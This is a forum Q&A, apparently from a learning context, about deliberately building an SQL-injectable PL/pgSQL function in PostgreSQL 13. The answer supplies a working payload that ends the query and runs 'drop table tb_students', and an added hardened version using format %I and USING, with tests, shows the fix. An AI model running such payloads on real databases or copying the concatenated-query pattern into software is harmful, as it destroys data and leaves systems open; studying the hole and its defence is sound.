I'm trying to make an SQL injection in my own function in PostgreSQL 13



  • Just for learning purposes, I'm trying to create a function using PL/pgSQL and make an SQL injection on it. I recently learned about format, USING and quote_literal and quote_ident, so I'm good about avoiding an SQL injection. What I'm trying to do is create a function that allows an SQL injection (i.e. a drop table).

    So I wrote this:

    create or replace function badfunc(tablename text, identifier int4)
    returns setof character varying as $$
    declare
        query text;
    begin
        query := 'select full_name from ' || $1 || ' where re = ' || $2 ||'';
        raise notice 'query: %', query;
        return query execute query;
    end;
    $$ language 'plpgsql';
    

    But when I execute this function with select badfunc('; drop table tb_students;', 1001); I get this error:

    [42601] ERROR: syntax error at or near ";" where: function PL/pgSQL badfunc(text,integer) linha 7 in RETURN QUERY
    

    So I think that's not how it is done. How can I achieve this SQL injection?



  • You have to make it a valid SQL statement:

    SELECT badfunc('(VALUES (''done'')) AS x(full_name); drop table tb_students; --', 1001);
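
The hardened counterpart of badfunc, as an added example that is not part of the original question or answer: the table name goes through format() with %I and the value is bound with USING instead of being concatenated. The name goodfunc, the column types of tb_students and the sample row are assumptions made so the script runs on its own.

```sql
-- Constructed sample table (column names taken from the question's query).
create table if not exists tb_students (re int4 primary key, full_name varchar);
insert into tb_students values (1001, 'Constructed Student') on conflict do nothing;

-- goodfunc is a hypothetical name; same signature as badfunc.
create or replace function goodfunc(tablename text, identifier int4)
returns setof character varying as $$
declare
    query text;
begin
    -- %I quotes the argument as one identifier (same rules as quote_ident),
    -- so '; drop table ...' becomes a single, nonexistent table name.
    -- The value never enters the SQL text: it is bound to $1 through USING.
    query := format('select full_name from %I where re = $1', tablename);
    raise notice 'query: %', query;
    return query execute query using identifier;
end;
$$ language plpgsql;

-- Normal call still works.
select goodfunc('tb_students', 1001);

-- Inputs of the kind shown in the question and the answer: each one is now
-- treated as a table name and fails with "relation ... does not exist".
do $$
declare
    payload text;
begin
    foreach payload in array array[
        '; drop table tb_students;',
        '(VALUES (''done'')) AS x(full_name); drop table tb_students; --'
    ] loop
        begin
            perform goodfunc(payload, 1001);
        exception when undefined_table then
            raise notice 'rejected: %', sqlerrm;
        end;
    end loop;
end;
$$;

-- The table is untouched after both attempts.
select to_regclass('tb_students') is not null as table_still_exists;
```

%I quotes a single identifier, so a schema-qualified table has to be passed as two arguments and formatted with '%I.%I'.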
    


